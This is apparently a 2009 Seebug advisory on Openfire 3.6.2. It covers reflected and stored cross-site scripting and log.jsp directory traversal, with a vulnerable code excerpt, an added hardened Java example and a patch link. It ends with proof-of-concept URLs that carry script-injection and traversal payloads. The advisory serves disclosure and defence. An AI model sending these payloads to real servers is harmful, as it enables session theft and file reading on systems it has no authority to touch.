Openfire Multiple Cross-Site Scripting and Directory Traversal Vulnerabilities

2009-01-11T00:00:00
ID SSV:4644
Type seebug
Reporter Root
Modified 2009-01-11T00:00:00

Description

BUGTRAQ ID: 32935,32937,32938,32939,32940,32943,32944,32945

Openfire (formerly Wildfire) is a cross-platform, open-source real-time collaboration (RTC) server written in Java.

Openfire's logviewer.jsp does not properly filter the log parameter, group-summary.jsp does not properly filter the search parameter, user-properties.jsp does not properly filter the username parameter, audit-policy.jsp does not properly filter the logDir, logTimeout, maxDays, maxFileSize and maxTotalSize parameters, and log.jsp does not properly strip <img> tags. This may lead to reflected cross-site scripting attacks.

The server-properties.jsp page displays properties without filtering, and the muc-room-summary.jsp page displays, without filtering, properties edited in muc-room-edit-form.jsp. A remote attacker can carry out stored cross-site scripting attacks through malicious property names.

log.jsp lacks filtering, allowing a remote attacker to read arbitrary .log files via a directory traversal attack. The vulnerable code segment in log.jsp is:

File logDir = new File(Log.getLogDirectory());
String filename = (new StringBuilder()).append(log).append(".log").toString();
File logFile = new File(logDir, filename);
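As an added example that is not part of this advisory or of Openfire's own code: the unchecked lookup quoted above, next to a hardened form that allowlists the log name and confirms the canonical path stays inside the log directory. The log directory location, the set of known log names and the sample parameter values are assumptions made for the demo.

```java
import java.io.File;
import java.io.IOException;
import java.util.Set;

public class LogPathCheck {

    // Mirrors the construction quoted from log.jsp: the "log" request parameter is
    // appended to ".log" and resolved under the log directory with no validation,
    // so a value containing ".." escapes the directory.
    static File resolveUnchecked(File logDir, String log) {
        String filename = new StringBuilder().append(log).append(".log").toString();
        return new File(logDir, filename);
    }

    // Hardened form (an assumed fix, not the vendor's patch): only a known log name is
    // accepted, and the canonical path is verified to lie under the log directory.
    static File resolveChecked(File logDir, String log) throws IOException {
        Set<String> knownLogs = Set.of("error", "warn", "info", "debug"); // assumed names
        if (log == null || !knownLogs.contains(log)) {
            throw new IllegalArgumentException("unknown log name: " + log);
        }
        File logFile = new File(logDir, log + ".log");
        String dirCanon = logDir.getCanonicalPath() + File.separator;
        String fileCanon = logFile.getCanonicalPath();
        if (!fileCanon.startsWith(dirCanon)) {
            throw new IllegalArgumentException("path escapes log directory");
        }
        return logFile;
    }

    public static void main(String[] args) throws IOException {
        // Constructed log directory; it does not need to exist for the path check.
        File logDir = new File(System.getProperty("java.io.tmpdir"), "openfire-logs");
        String traversal = "../../../outside"; // constructed value of the traversal shape
        System.out.println("unchecked resolves to: "
                + resolveUnchecked(logDir, traversal).getCanonicalPath());
        try {
            resolveChecked(logDir, traversal);
        } catch (IllegalArgumentException e) {
            System.out.println("checked rejected: " + e.getMessage());
        }
        System.out.println("checked accepted: "
                + resolveChecked(logDir, "error").getCanonicalPath());
    }
}
```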

Ignite Realtime Openfire 3.6.2 vendor patch:

Ignite Realtime

The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage:

http://www.igniterealtime.org/downloads/index.jsp#openfire

http://vulnsite.com/logviewer.jsp?clearLog=false&emailLog=false&lines=&log=%22/%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E%3C!--&markLog=false&mode=desc&refresh=&saveLog=false
http://vulnsite.com/group-summary.jsp?search=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E<!--
http://vulnsite.com/user-properties.jsp?username=%3Cscript%3Ealert(%27xss%27)%3C/script%3E
http://vulnsite.com/audit-policy.jsp?maxTotalSize=%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E%3C!--&update=Save%20Settings
http://vulnsite.com/log.jsp?log=%3Cimg%20src=%27%27%20onerror=%27javascript:alert(%22xss%22)%27%3E
log.jsp?log=..\..\..\windows\debug\netsetup